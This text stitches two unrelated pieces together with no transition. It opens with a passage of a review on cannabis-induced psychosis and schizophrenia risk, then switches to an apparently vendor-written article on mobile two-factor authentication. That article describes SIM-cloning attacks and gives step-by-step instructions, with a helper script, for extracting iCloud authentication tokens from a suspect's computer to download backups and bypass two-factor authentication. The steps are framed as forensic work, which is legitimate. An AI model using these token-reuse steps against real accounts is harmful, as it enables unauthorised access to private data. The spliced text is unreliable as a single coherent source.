The SPQ was used as a proxy for baseline psychotic symptoms and can be taken to indicate risk of, or susceptibility to, psychosis. This study found greater acute transient effects on psychotic symptoms in individuals with higher SPQ scores at baseline. Acute effects were taken as the difference between Psychotomimetic States Inventory (PSI) scores 10–15 minutes after use and PSI scores 3–5 days later, after at least 24 hours of cannabis abstinence.
This result provides evidence that certain individuals, especially those experiencing some mild psychotic symptoms at baseline, are more prone to acute transient psychotic symptoms associated with cannabis use than others.
Having described some of the evidence for an acute association between cannabis and psychosis, as could be seen in a Cannabis Intoxication diagnosis, we will move on to describe Cannabis Intoxication’s more severe and persistent progeny, CIPD.
Cannabis-Induced Psychotic Disorder (CIPD)
Substance-Induced psychotic disorders are recognized by the DSM-5 and are placed in the category of Schizophrenia Spectrum and Other Psychotic Disorders. Substance-Induced psychotic disorders related to practically all substances of abuse can be described using this diagnosis (pp 110–115).
A diagnosis of Cannabis-Induced Psychotic Disorder is given when one or both of hallucinations and delusions are present, the hallucinations and/or delusions developed during or soon after cannabis intoxication, the disturbance does not occur exclusively during the course of a delirium, and the disturbance causes clinically significant distress or impairment in social, occupational, or other important areas of functioning.
Other criteria for the disorder are that cannabis should be thought to be capable of producing the disturbance seen and that the disturbance should not be able to be better explained by an independent psychotic disorder that is not cannabis-induced (such as pre-existing schizophrenia). The DSM-5 suggests that if symptoms last longer than one month a diagnosis other than CIPD should be considered (p. 110).
Substance-induced psychotic disorders generally can occur in the context of recent intoxication or withdrawal from a substance (for example with alcohol) but in the case of cannabis only psychotic symptoms occurring in the context of recent intoxication are thought to appropriately lead to a CIPD diagnosis (p. 114).
Several things differentiate CIPD from Cannabis Intoxication. First and foremost is that in CIPD the hallucinations and/or delusions are the focus of the clinical presentation and are severe enough to warrant clinical attention/treatment as opposed to the psychotic symptoms that can be seen in Cannabis Intoxication which are more mild and self-limited and are not even required to make that diagnosis.
A further distinction is that the hallucinations in CIPD are experienced without insight whereas in Cannabis Intoxication the hallucinations when present are experienced with insight intact and the DSM-5 linguistically downgrades these in places from frank hallucinations to “perceptual disturbances.” In addition to greater intensity/severity of symptoms CIPD can also have a much longer duration than Cannabis Intoxication.
Cannabis Intoxication will necessarily resolve within 24 hours, whereas CIPD can last for days and even weeks after cannabis exposure. However, criteria for CIPD could also be met in a presentation lasting only on the order of hours if the symptoms are severe.
The concept of a cannabis psychosis apart from simple intoxication has been recognized for literally hundreds of years; take the following example from 1779, describing a preparation of cannabis known as “Bangue”:
“Bangue is an intoxicating herb; in the use of which it is hard to say what pleasure can be found, it being very disagreeable to the taste and violent in its operation which produces a temporary madness, that in some, when designedly taken for that purpose, ends in running, what they call a muck, furiously killing every one they meet without distinction till themselves are knocked on the head like mad dogs (p. 21).”
Another historical example of a CIPD-consistent cannabis/psychosis association comes from the French psychiatrist Dr Jacques-Joseph Moreau, who in 1845 described the effects of hashish:
“acute psychotic reactions, generally lasting but a few hours, but occasionally as long as a week…illusions, hallucinations, delusions, depersonalization, confusion, restlessness and excitement.”
A 2016 study using emergency department data from Vallersnes et al. gives us a registry-data example of a cannabis/psychosis association consistent with CIPD. This study searched a European database (Euro-DEN) that tracks Emergency Department (ED) visits for acute recreational drug toxicity.
Over a one-year period across 16 centers they found 90 ED presentations where psychosis was a presenting complaint and acute cannabis use had occurred. In 31 of those presentations cannabis was the sole substance reported.
This study excluded overdoses/self-harm presentations and allowed for substances documented to have been used acutely to be patient and observer reported. This second distinction is particularly important when trying to assess association between acute cannabis use and CIPD-consistent psychosis since lab-testing for cannabis can be positive long after acute ingestion.
Unfortunately, most of the literature with respect to documented cases consistent with CIPD diagnoses is limited to case reports and case series and many of the oft-cited examples are from decades ago.
In general we can say that these case reports and series describe acute cannabis use, psychotic symptoms severe enough to bring the individual to medical attention, symptoms occurring immediately after cannabis use, and return to baseline several hours to weeks after ingestion [44,45,46,47,48,49,50,51].
The one study large by number of subjects (N = 36,000) looked at American soldiers in Germany and documented some cases of “toxic psychosis” and “schizophrenic reactions” but did not control for use of other drugs and alcohol. One of these studies had enough follow-up to document that individuals who later relapsed to cannabis use uniformly had a recurrence of psychotic symptoms.
The return to baseline functioning as documented in these case reports is crucial in order to maintain the concept of CIPD. The difficulty in confidently diagnosing CIPD has been widely noted, as confirming absence of prior prodromal or psychotic symptoms and then also confirming return to baseline is quite difficult [31,52,53].
The “fuzziness” of the diagnosis and the dissimilar situations where it applies lead to confusion. CIPD criteria are met both in cases of extreme intoxication, where psychotic symptoms overwhelm the clinical picture but may be very short-lived, and in situations that, apart from knowledge of recent cannabis exposure, could appear identical to a first-break psychosis as seen in schizophrenia (i.e., requiring extended hospitalization and antipsychotic medication).
Despite these problems CIPD remains an important diagnostic construct that should not be ignored. CIPD allows us to conceptualize that there is a middle ground in the cannabis/psychosis association between simple intoxication and long-term psychosis. In the following section we will describe evidence linking CIPD to later schizophrenia diagnoses, thus completing a diagnostic chain from Cannabis Intoxication to CIPD to schizophrenia.
Schizophrenia
Schizophrenia is the prototypical psychotic disorder and is characterized by its chronicity and severity. Historically, a schizophrenia diagnosis has required the presence of so-called first rank symptoms indicating severe psychosis [26,28]. Schizophrenia is quite common, with a global prevalence of approximately 0.7% [54,55].
DSM-5 diagnostic criteria for schizophrenia are quite detailed (p. 99), so let us paraphrase: schizophrenia is diagnosed when multiple psychotic symptoms are present, coupled with a decreased level of work and/or social functioning, and the total duration of the disturbance is greater than 6 months.
Two or more active-phase psychotic symptoms, including delusions, hallucinations, disorganized speech, grossly disorganized or catatonic behavior, and negative symptoms, must be present for at least a month if untreated. One of the active-phase symptoms must be delusions, hallucinations, or disorganized speech (p. 99).
The remainder of the six-month period required to make the diagnosis can include only prodromal or residual/attenuated symptoms. The DSM-5 does not make explicit reference to the historical concept of first rank symptoms; however, these symptoms are part of a DSM-5 schizophrenia diagnosis in most cases, given that one of delusions, hallucinations, or disorganized speech is required and delusions and hallucinations are first rank symptoms [25,27,28].
The association between cannabis and schizophrenia has been a heavily researched and debated topic in the literature, and rightly so. Schizophrenia has a huge morbidity and mortality burden, and if cannabis is a cause or a component cause it would be a highly modifiable risk factor for this devastating disease.
Interest in the cannabis/schizophrenia association was sparked by a study using Swedish military conscription data led by Andreasson. These data represent >97% of the 18–20-year-old male population of Sweden from 1969.
Data on substance use including cannabis was collected at time of conscription and schizophrenia outcomes over the next 15 years were collected and matched with the subjects’ initial reports of cannabis use.
The study documented an increased risk for schizophrenia in those who had ever used cannabis prior to conscription and a dose–response relationship between the number of lifetime uses of cannabis and schizophrenia risk. Zammit et al. conducted a 27-year follow-up of the same cohort and re-analyzed the data.
The number of subjects analyzed was 50,053. The Zammit et al. study reported an odds ratio for schizophrenia of 2.2 for ever using cannabis and an odds ratio of 6.7 for those who had used cannabis more than 50 times. The effect remained after adjusting for some potential confounders including psychiatric diagnoses at conscription, IQ score, personality variables concerned with interpersonal relationships, place of upbringing, paternal age, and cigarette smoking.
The adjusted odds ratio for ever using cannabis was 1.5 and the adjusted odds ratio for >50 cannabis uses lifetime use was 3.1. The association between cannabis use and a chronic psychotic disorder (either schizophrenia or schizophreniform disorder) in longitudinal studies has been replicated multiple times [58,59].
A 2016 meta-analysis of 10 studies (66,816 total individuals across the studies) looking at the association between degree of cannabis use and subsequent psychotic symptoms found an overall OR of 3.90 for heavy users compared to never users.
The studies used in this meta-analysis had at least three groups of cannabis use: never; one or more intermediate levels of use; and a “heavy” level either by duration of cannabis use, frequency of cannabis use, or total number of times cannabis had been used lifetime. This meta-analysis included outcomes other than just chronic psychotic disorders but is very useful as evidence that the dose–response relationship is robust.
A case-control study reported that, among patients with psychotic disorders, those who used cannabis daily, used higher-potency cannabis, or started at a younger age tended to experience the onset of psychotic symptoms earlier than patients who did not use cannabis in these high-risk ways. This can be taken as further evidence of a dose–response relationship.
There is also a well-established association between CIPD and later schizophrenia. A study using Danish registry data from 1994–2014 examined the proportion of patients given substance-induced psychotic disorder diagnoses who would go on to later be given schizophrenia or bipolar diagnoses.
These were patients that did not have schizophrenia or bipolar disorder diagnoses before the incident substance-induced psychotic episode. In this registry study it was reported that 41.2% of patients with cannabis-induced psychotic disorder eventually converted to schizophrenia. A total of 47.4% of patients with cannabis-induced psychotic disorder eventually converted to either schizophrenia or bipolar disorder.
It is intuitive that having a substance-induced psychotic episode, whatever the offending substance, could be a substantial risk factor for future psychiatric morbidity. That said, in the same Danish registry study, cannabis had the highest rate of conversion from substance-induced psychosis to schizophrenia or bipolar disorder out of all substances investigated.
Compare that 47.4% rate for cannabis to 32.3% for amphetamines, 20.2% for cocaine, 27.8% for hallucinogens, and 35.0% for mixed/other substances. Fifty percent of the cannabis-induced psychosis patients that converted to schizophrenia did so within 3.1 years of the incident psychotic episode while the remaining 50% that ended up converting to schizophrenia did so over many years.
This delayed conversion after the incident CIPD episode can be looked at as evidence for the CIPD episode being its own entity as opposed to a mis-diagnosed first episode of schizophrenia.
Other registry studies have also found persons with CIPD-consistent presentations to have a high rate of conversion to schizophrenia. A Swedish registry study of substance-induced psychosis converting to schizophrenia found cannabis to have the highest conversion rate of all substances, at 18%.
A Finnish study of 18,478 inpatient cases found that 46% of CIPD cases converted to schizophrenia, the highest percentage for any substance. A study using Scottish data found that 21.4% of people with cannabis-induced psychotic disorder eventually converted to schizophrenia.
In that study cannabis had a lower conversion rate than cocaine- and solvent-induced psychoses; however, the Ns for cocaine- and solvent-induced disorders were very small (24 and 14, respectively, compared to 276 for cannabis). In the Scottish study, “multiple substance” or “other” substance-induced psychoses showed a conversion rate of 21.5%. Compared to the Danish, Swedish, and Finnish studies, the Scottish data found cannabis-induced psychotic disorder conversion to schizophrenia to be more similar to the rates for other substances.
It is important to note that most of these registry studies look at cannabis use in relatively young people and subsequent schizophrenia or other psychotic outcomes. Age of onset of cannabis use appears to heavily influence the cannabis/schizophrenia association. One potential explanation is that cannabis has stronger effects on developing brains, and that is what leads to a stronger association with future psychoses.
Genetic risk is an important part of the cannabis/schizophrenia association as well. We should expect this, as schizophrenia has often been estimated to have approximately 80% heritability.
A study from Gage et al. used single nucleotide polymorphisms (SNPs) associated with cannabis initiation and SNPs associated with schizophrenia to calculate a small causal effect (OR = 1.04) of cannabis initiation on subsequent schizophrenia.
This study also illustrated the complex and seemingly bidirectional nature of the cannabis/schizophrenia association, calculating a stronger causal effect of schizophrenia on cannabis initiation (OR = 1.10). Another genetic study using SNPs found a similar result, with OR = 1.1 for cannabis being causally implicated in schizophrenia and OR = 1.16 for the reverse.
A specific example of genetic involvement in the cannabis/schizophrenia association can be seen in the COMT gene. The COMT gene codes for the enzyme catechol-O-methyltransferase, which is important in the breakdown of dopamine, particularly in the prefrontal cortex. The Val158Met SNP is a valine-to-methionine substitution that alters enzyme activity. Val/Val homozygotes have the highest enzymatic activity, Val/Met heterozygotes have intermediate activity, and Met/Met homozygotes have the lowest activity.
This results in Val/Val homozygotes depleting dopamine the fastest and Met/Met homozygotes the slowest. Dysregulation of dopamine has long been considered a crucial part of the pathophysiology of schizophrenia and a great deal of research has been done to investigate the link between COMT polymorphisms and schizophrenia, particularly with respect to negative symptoms and cognition [69,70].
These studies have shown a variety of interesting results, including some demonstrating significant interactions between cannabis use, COMT genotype, and the development of schizophrenia [17,71,72,73,74,75,76,77]. In 2005 Caspi et al. reported data on 803 individuals born in Dunedin, New Zealand (known as the Dunedin cohort).
These individuals were followed up periodically from ages 3 to 26. This study found that 13% of adolescent cannabis users with the Val/Val genotype met criteria for schizophreniform disorder at age 26 while only 1.4% of non-cannabis-using adolescents with the same Val/Val genotype met criteria for the disorder.
Schizophreniform disorder has the same DSM-5 criteria as Schizophrenia, but this diagnosis is given when the symptoms are only known to have lasted from 1–6 months. The odds ratios calculated for adolescent cannabis use and subsequent schizophreniform diagnosis for the three genotypes were 10.9 for Val/Val, 2.5 for Val/Met, and 1.1 for Met/Met. Genotype by itself without the covariant of cannabis use was not found to be significantly associated with subsequent schizophreniform diagnosis.
The impressive results from this oft-cited study demonstrate very well the concept that there appears to be an important gene–environment interaction to be considered when assessing the cannabis/schizophrenia link. However, attempts to replicate this study have been mixed with both positive and negative results [78,79,80,81,82,83,84,85].
Another example of the COMT gene’s role in the cannabis/schizophrenia association is seen in a study from Pelayo-Terán et al. published in 2009. This study looked at 169 patients in Spain with first-episode psychosis and examined how the interaction between COMT genotype and cannabis use affected age of onset of psychotic symptoms and duration of untreated psychosis prior to treatment presentation.
This study found that low enzymatic activity Met/Met patients who were not cannabis users tended to have a later age of onset of psychosis and a longer period of untreated psychosis compared to Val/Val or Val/Met cannabis non-users. Longer period of untreated psychosis can be considered a proxy for more mild symptoms or primarily negative symptoms as it is expected that severe positive symptoms will be what brings patients to acute medical attention.
Based on this data the Met/Met genotype can be considered something of a protective factor against severe/early disease. The most salient finding of the study was that cannabis users with the Met/Met genotype did not have the delayed onset or longer period of untreated psychosis seen in Met/Met non-users.
This suggests that cannabis use changes the natural course of psychotic symptoms typically seen with the Met/Met genotype. This study also found that cannabis users of any COMT genotype experienced an earlier onset of symptoms compared to non-users.
In addition to discussing the cannabis/psychosis association with respect to the onset of schizophrenia, we can discuss the impact of cannabis use on people who already have schizophrenia. D’Souza et al. conducted a double-blind placebo-controlled study in which intravenous THC was administered to schizophrenia patients already in treatment and maintained on stable antipsychotic dosages.
The study design was the same as in the same author’s study on healthy subjects described above in the Cannabis Intoxication section of this review. Results were similar to those in healthy individuals, with transient increases in positive and negative symptoms seen via the PANSS (although, as expected, baseline scores were higher in the schizophrenia population).
It is important to point out that these exacerbations in psychotic symptoms with cannabis administration were seen despite the schizophrenia patients being on dopamine-blocking antipsychotic drugs. A higher percentage of schizophrenia patients experienced transient symptom exacerbations compared to the study with healthy persons.
Further, schizophrenia patients with a cannabis use history have been documented to have longer and more frequent psychiatric hospital stays than schizophrenia patients without such a history, which would seem to indicate a higher symptom burden.
In this article we’ll discuss the differences between the implementations of two-factor authentication on popular mobile platforms. We’ll look at how two-factor authentication is implemented in Android, iOS and Windows 10 Mobile, and discuss the usability and security implications of each implementation.

What Is Two-Factor Authentication?
Two-factor authentication is an extra security layer protecting access to user accounts beyond the username and password. It requires a verification step that is separate from the password. Ideally, two-factor authentication schemes verify “something you have” in addition to “something you know”. In practical terms this is not always convenient for the end user, so very few straightforward implementations exist (mostly in the banking industry in Europe).
Using the extra verification step based on a piece of information that only the user knows or has access to makes it significantly harder for potential intruders to break in.
Historically, banks were the first to use two-factor authentication. A low-tech solution of pre-printed, single-use Transaction Authentication Numbers (TANs) delivered to the user’s registered home address was used on top of the login and password to authorize bank transfers. Banking technology has since moved on, utilizing a wide range of authentication options (http://www.wikibanking.net/onlinebanking/verfahren/phototan/). For example, an authentication scheme called photoTAN makes use of complex 3D codes and interactive two-way validation. In a typical photoTAN implementation, the bank generates a unique 3D code. The code must be scanned by an authorized device such as a smartphone or token which, again, has to be initialized with an interactive two-way process. The device generates a verification code that must be entered into the confirmation box.
While this authentication scheme provides exemplary security with full control over authorized devices, the authentication process is just too slow and cumbersome for an average smartphone user performing day to day activities. Other authentication schemes employ proprietary devices and chip technologies, making them even less attractive for mass use.
The developers of the major mobile operating systems (Apple, Google and Microsoft) each created their own implementation of two-factor authentication in an attempt to balance convenience and security. The three companies arrived at very different results. So let’s have a look at what we have today for two-factor authentication on the three popular mobile platforms.
Apple has had some form of two-factor authentication since 2013. Designed to protect the user’s Apple ID from abuse resulting in direct financial loss (unauthorized purchases, password changes, etc.), the then-current “Two-Step Verification” scheme offered a very limited protection scope. Apple was working on a more universal solution for the upcoming version of iOS.
In August 2014, news outlets were struck with a story of 500 private pictures of various celebrities leaked via a breach of Apple’s iCloud services (https://en.wikipedia.org/wiki/ICloud_leaks_of_celebrity_photos). The photos were extracted from iCloud storage. The hackers performed a targeted attack on user names, passwords and security questions using a combination of social engineering and brute-force attacks.
This was a major scandal, and Apple reacted. Ahead of the iOS 9 release, Apple expanded Two-Step Verification to protect iCloud sign-ins, which included iOS backups and photos.
Apple’s First Attempt: Two-Step Verification
Two-step verification is a half-baked solution and a rushed answer to a long-standing problem. This authentication method was slapped on top of Apple’s existing mobile ecosystem and works completely on the server side. Two-step verification uses verification codes pushed to trusted devices. Since Find My Phone is used to deliver verification codes to a selected trusted device, the code would show up on the device even with its screen locked. This was but one weakness of this implementation.
Alternatively, two-step verification codes can be delivered via text messages or phone calls to one of the registered phone numbers. Users could generate app-specific passwords from the Apple ID account page https://appleid.apple.com/. Up to 25 app-specific passwords could be active at any given time.
Account recovery would be performed with a printable 14-character Recovery Key. Should the user lose their Recovery Key, they could as well lose access to their Apple account.
• Verification code pushed (via Find My Phone) to a selected trusted device
o Shows up even on locked devices!
• Text message or phone call to a registered number
• Application-specific passwords generated from Apple ID account page https://appleid.apple.com/
o Up to 25 active app-specific passwords at any given time
o Can be revoked individually
• Account recovery: 14-character printable Recovery Key
Two-step verification was never intended to be, and could not be, a fully featured multiple-factor authentication solution. Since support for two-factor authentication was not baked into the OS itself, it could only protect users in a limited set of circumstances:
• Sign in to Apple ID account page
• Sign in to iCloud on a new device or at iCloud.com
• Sign in to iMessage, Game Center, or FaceTime
• Make an iTunes, iBooks, or App Store purchase from a new device
• Get Apple ID related support from Apple
Enrolling into two-step verification is possible from an Apple device or through a Web browser by signing in to My Apple ID. Users are required to enroll at least one trusted phone number, which represents yet another potential vulnerability of this scheme.
Two-Step Verification Security
How secure is Apple’s two-step verification? With no OS-level support, it can be characterized as “better than nothing”. With Find My Phone used for delivering verification codes, a hacker could easily request and receive a code on a stolen iPhone. Text and phone call delivery open yet another vector of attack, allowing intruders to request a duplicate/replacement SIM card from the victim’s mobile operator using a fake power of attorney.
This last method is commonly used in Russia to target victims’ online banking apps. The banks have responded by tying verification to the SIM card’s ICCID identifier rather than relying solely on the phone number. However, this is not the case with Apple, so a cloned/replacement SIM card can be successfully used to receive verification codes.
Two-step verification is still available today alongside Apple’s second implementation called “Two-Factor Authentication” (albeit only one system can be active for a given Apple ID). As such, we’ll view it in a modern rather than legacy context. In today’s day and age, Apple’s Two-Step Verification is an afterthought at best. Its limited protection scope, obvious security shortcomings, and difficult recovery procedure should the user lose access to their secondary authentication factor leave much to be desired.
• Initially, 2SV did not protect iOS backups and iCloud data; protection added after Celebgate
• Also, 2SV did not prevent restoring iCloud backups onto new devices (now it does)
• Delivery via text messages or phone calls is insecure
o SMS/phone call delivery can be selected and no prompt will appear on trusted devices
• Find My Phone push is even less secure than SMS
• Verification code appears on the lock screen
o Can be accessed without entering the passcode
• Was considered the weakest implementation of all the major tech firms http://www.theregister.co.uk/2013/05/31/apple_2fa_security_weak/
Apple’s Second Attempt: Two-Factor Authentication
While two-step verification worked (and continues to work) on top of the operating system, Apple continued their work on a proper implementation. The resulting new authentication method dubbed “Two-Factor Authentication” was finally released with iOS 9.
This new authentication method is fully integrated into the mobile OS, and protects all attempts to sign in with the user’s Apple ID on a new device.
Apple’s Two-Factor Authentication, while designed to serve the same purpose, works in a distinctly different way. Interactive push notifications that must be confirmed before one can access the 6-digit verification code are now delivered by default to all trusted devices. It is no longer possible to select “text message/phone call” to quietly receive an SMS with a verification code; all trusted devices will receive a 2FA push prompt immediately upon sign-in attempt.
The following list summarizes verification code delivery options with Apple two-factor authentication:
• A notification is instantly pushed to all trusted devices
o Interactive prompt
o Must unlock device to respond to prompt and access a 6-digit code
o Must enter the received 6-digit code to verify sign-in
o Each trusted device initialized with unique seed; different verification codes pushed to different devices
o Only iOS (or macOS) devices can be trusted
• 6-digit code generated from device settings (can be used offline)
o Each device uses unique seed, generated codes are different across devices (this is not a given on other platforms)
• Text message or phone call to a registered number
o An attempt to deliver push notifications to trusted devices is made beforehand
o Accessible via “Did not get a verification code?” prompt
• App-specific passwords
o Can generate and revoke app-specific passwords (e.g. veur-crlz-wksx-yege) in https://appleid.apple.com/account/manage
o Can append 6-digit authentication code to original password
Interestingly, there are two types of app-specific passwords for those apps that don’t support Two-Factor Authentication. The first type can be generated via the user’s Apple Account and looks like this: veur-crlz-wksx-yege. These passwords can only be used for limited access to certain types of information (e.g. iCloud email), and cannot be used to download iCloud backups.
The second type of app-specific passwords is more interesting. It can be produced by appending a 6-digit verification code (received or generated via the usual means) to the original password, and can be used to access all types of data. For example, such passwords can be used to download iOS backups from iCloud, or to sign in to Apple ID/App Store on an iPhone running iOS 8 (which does not support Two-Factor Authentication).
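The composition rule for this second type is plain string concatenation. A brief sketch of the idea; the password and code values below are made up for illustration, not real credentials:

```python
# Sketch of composing the second type of app-specific password by appending
# a 6-digit verification code to the account password. All values here are
# illustrative, not real credentials.
def composed_app_password(account_password: str, verification_code: str) -> str:
    if len(verification_code) != 6 or not verification_code.isdigit():
        raise ValueError("expected a 6-digit verification code")
    return account_password + verification_code

print(composed_app_password("MySecretPass", "123456"))  # MySecretPass123456
```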
Apple Two-Factor Authentication and Time-based One-time Password Algorithm
Starting with iOS 9, Apple added the ability to generate verification codes offline. The actual iOS device (iPhone, iPad or iPod Touch) is used as a trusted device implementing the Time-based One-time Password (TOTP) algorithm.
Unlike other platforms, Apple does not allow for manual initialization of trusted devices by scanning QR codes or entering a secret. Instead, each device receives a unique seed directly from Apple. This achieves two goals. First, each device receives a unique seed that can be revoked at any time without affecting other devices’ trust status (this is not the case with other platforms). Second, by making the seed inaccessible to the end user, Apple effectively keeps everything authentication-related within their closed ecosystem. Under these terms, you can only initialize an Apple device as a trusted device. You cannot have an Authenticator app on an Android smartphone or Windows 10 Mobile device.
• TOTP: offline, time-dependent code generated from the Settings of a trusted device
o Each trusted device initialized with unique seed
o Trusted devices can be individually revoked
o All devices generate different TOTP codes
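Offline codes like these follow the standard TOTP construction. Below is a minimal sketch; Apple does not publish the exact parameters of its implementation, so the HMAC-SHA1, 30-second step and 6-digit output used here are the industry-standard defaults from RFC 6238, not confirmed Apple internals:

```python
# Minimal RFC 6238 TOTP sketch. Illustrates the standard algorithm
# (HMAC-SHA1, 30-second time step, 6 digits) that interoperable
# authenticator apps implement; Apple's exact parameters are not public.
import hashlib
import hmac
import struct
import time

def totp(secret, timestamp=None, step=30, digits=6):
    """Generate a time-based one-time password from a shared seed."""
    if timestamp is None:
        timestamp = int(time.time())
    counter = timestamp // step                       # time steps since the epoch
    msg = struct.pack(">Q", counter)                  # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: ASCII seed "12345678901234567890" at T=59 seconds.
print(totp(b"12345678901234567890", timestamp=59))  # 287082
```

Because the code depends only on the shared seed and the current time, the device and Apple's servers can compute the same value independently, with no network connection needed on the device side.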
In order to enable two-factor authentication, Apple requires the user to verify at least one phone number. This opens up a potential vector of attack.
• Intruder has the ability to use SMS or phone call to receive codes
• One can pull a SIM card and use it in a dumb phone to receive verification codes
• Criminals can clone or order a new SIM card and use it to receive codes
o This is a massive problem in Russia
o Thieves use fake IDs, fake power of attorney
o Thieves gaining access to victim’s online banking
There is some improvement in this department compared to Apple’s old Two-Step Verification. When Two-Factor Authentication is active, any attempt to access the user’s Apple ID immediately pushes a 2FA prompt to all trusted devices before the intruder can request a code delivered by SMS or phone call.
Apple Two-Factor Authentication Security
This new authentication scheme is immensely better than the old Two-Step Verification. It’s both more secure and more convenient, allowing users to generate offline authentication codes on trusted devices and prompting them on all of their devices if someone attempts to sign in to their account.
Attackers can still bypass some of these security measures. For example, if they sign in to victim’s account during the night (using a cloned/replaced SIM card, for example), the chance that the victim will be able to react to sign-in prompts is minimal.
Bypassing Two-Factor Authentication
Two-factor authentication is a roadblock when investigating an Apple device. Obtaining a data backup from the user’s iCloud account is a common and relatively easy way to acquire evidence from devices that are otherwise securely protected. It might be possible to bypass two-factor authentication if one is able to extract a so-called authentication token from the suspect’s computer.
Authentication tokens are used by iCloud Control Panel that comes pre-installed on macOS computers, as well as iCloud for Windows that can be installed on Windows PCs. Authentication tokens are very similar to browser cookies. They are used to cache authentication credentials, facilitating subsequent logins without asking the user for login and password and without prompting for secondary authentication factors. Authentication tokens do not contain the user’s password, and not even a hash of the password. Instead, they are randomly generated sequences of characters that are used to identify authorized sessions.
Tip: The use of authentication tokens allows bypassing two-factor authentication even if no access to the secondary authentication factor is available.
Extracting an authentication token and re-using it on a different computer may allow an investigator to sign in to the user’s Apple ID services, which include access to iOS backups stored in iCloud and iCloud Drive. In order to make use of authentication tokens, one must install a cloud acquisition tool such as Elcomsoft Phone Breaker.
The Forensic edition of Elcomsoft Phone Breaker comes with the ability to acquire and use authentication tokens from Windows and Mac OS X computers, hard drives or forensic disk images. Authentication tokens for all users of that computer can be extracted, including domain users (providing that their system logon passwords are known). The tools are available in both Windows and Mac versions of the tool.
Authentication tokens are obtained from the suspect’s computer on which iCloud Control Panel is installed. In order for the token to be created, the user must have been logged in to iCloud Control Panel on that PC at the time of acquisition. Authentication tokens can be extracted from live systems (a running Mac OS or Windows PC) or retrieved from users’ hard drives or forensic disk images.
iCloud Control Panel is an integral part of Mac OS systems, and installs separately on Windows PCs. Most users will stay logged in to their iCloud Control Panel for syncing contacts, passwords (iCloud Keychain), notes, photo stream and other types of data without re-typing their password. All this means that the probability of obtaining authentication tokens from PCs with iCloud Control Panel installed is high.
Extracting Authentication Tokens
To extract iCloud authentication token, launch Elcomsoft Phone Breaker (Forensic Edition) and click “Extract authentication token” on the main window.
Specify path to the token file (usually %appdata%\Apple Computer\Preferences\)
Specify path to the user’s master key, which is required to decrypt the token, then click “Extract”.
Elcomsoft Phone Breaker will extract, decrypt and display the token. You will be able to export the token into a file. You can now use this token to log in to iCloud and download backups or files from iCloud.
If you are using a Mac OS X computer, follow the guidelines published on ElcomSoft Web site:
Up to date information on extracting authentication tokens is available at
Using Authentication Tokens to Download iCloud Backups
Downloading an iCloud backup using an authentication token is very similar to using an Apple ID and password. Instead of supplying the Apple ID and password combination, you supply an authentication token. Note that two-factor authentication is successfully bypassed if you use the token.
1. In the Tools menu, select the Apple tab.
2. Select Download backup from iCloud.
3. On the Download backup from iCloud page, define authentication type as Token.
4. Copy the token from the file, and paste it into the “Token” box.
5. Click Sign In to continue downloading the backup. If the token has not expired, you will be able to sign in without entering the user’s Apple ID, password, or the secondary authentication code.
Note that you need to copy the full Authentication token string from the text file you’ve extracted. On the following screen shot, the entire second line of the text file represents the authentication token:
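For scripted workflows, pulling the token out of the exported file can be automated. The sketch below assumes the layout just described (account identifier on the first line, token on the second); the file name and token value are illustrative, and the exact layout may differ between tool versions:

```python
# Read an exported authentication token, assuming the layout described
# above: the token occupies the entire second line of the text file.
# The file name and token value are illustrative.
def read_token(path):
    with open(path, "r", encoding="utf-8") as f:
        lines = f.read().splitlines()
    if len(lines) < 2:
        raise ValueError("unexpected token file layout")
    return lines[1].strip()

# Create a sample export file and read the token back from it.
with open("icloud_token.txt", "w", encoding="utf-8") as f:
    f.write("user@example.com\nAQAAAABYs0m7EXAMPLETOKEN=\n")
print(read_token("icloud_token.txt"))  # AQAAAABYs0m7EXAMPLETOKEN=
```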
A very common scenario for Apple users is losing their only iPhone while traveling. In such situations, a SIM card with a trusted phone number is also missing and not always easily obtainable. With Apple’s excellent backup system, recovering from such an uncomfortable situation could be as easy as visiting a nearby Apple Store for a new iPhone, entering iCloud credentials and waiting for the phone to restore from the last backup.
Two-factor authentication becomes a real roadblock. If Two-Step Verification was enabled, users were given an option to print a long Recovery Code. With this Recovery Code, they could bypass the secondary verification step. If no Recovery Code is available, there is no straightforward way to regain control over Apple ID. (Calling Apple and having a saved credit card may or may not help).
With Two-Factor Authentication, Apple introduced a formal way to reinstate account access (https://support.apple.com/en-ie/HT204921). Users are advised to go to iforgot.apple.com and follow the prompts. Apple may verify additional information such as saved credit card numbers. Even though the process is automated, recovery may take a very long time.
More information about two-step verification and two-factor authentication is available from the following sources:
• Apple two-factor authentication and the iCloud
• Apple two-factor authentication vs. two-step verification
• Security and your Apple ID
• Two-step verification for Apple ID
• Two-factor authentication for Apple ID
• Availability of two-factor authentication for Apple ID
• Switch from two-step verification to two-factor authentication
• If you can‘t sign in with two-step verification using your Apple ID
In addition, you may find the following reading both useful and interesting:
Google’s support of two-factor authentication is extensive, ranging from pre-printed backup keys to interactive, push-based notifications delivered to devices with up-to-date versions of Google Play Services via Google Cloud Messaging.
Before we start discussing Google’s two-factor authentication, let’s first look at how Google protects user accounts if two-factor authentication is not enabled. If Google detects an unusual sign-in attempt (such as one originating from a new device located in a different country or continent), it may prompt the user to confirm their account. This may be done in various ways, such as receiving a verification code at a backup email address previously configured in that account. Interestingly, even receiving and entering such a code and answering all the additional security questions Google may ask does not actually confirm anything. Without two-factor authentication, Google may easily decline sign-in requests it deems suspicious. From first-hand experience, one is then forced to change their Google Account password. (Interestingly, Microsoft exhibits similar behavior, yet the company allows using two-factor authentication in such cases even if it is not enabled for that account. Weird, but that’s how it works.)
Once two-factor authentication is activated, things change. One is no longer locked out of their Google Account even when traveling, and even if attempting to log in from a new device. So let us have a look at what Google has to offer.
The Low-Tech Solution: Printable Backup Codes
Google offers the ability to generate a set of 10 backup codes. These are displayed in a ready-to-print format (business card size), allowing users to carry this essential piece of security in their wallet.
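As a toy illustration only (the exact length and format of Google’s codes are assumptions here, and a real service would generate and verify these server-side), backup codes are simply independent random numbers of a fixed width:

```python
import secrets

def generate_backup_codes(count: int = 10, digits: int = 8) -> list:
    # Each code is an independent random number, zero-padded to a fixed width.
    return [f"{secrets.randbelow(10 ** digits):0{digits}d}" for _ in range(count)]

codes = generate_backup_codes()
print(codes)
```

Because each code is used once and then crossed off, losing the printed card only matters if an attacker also knows the account password.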
Time-Based One-Time Passwords
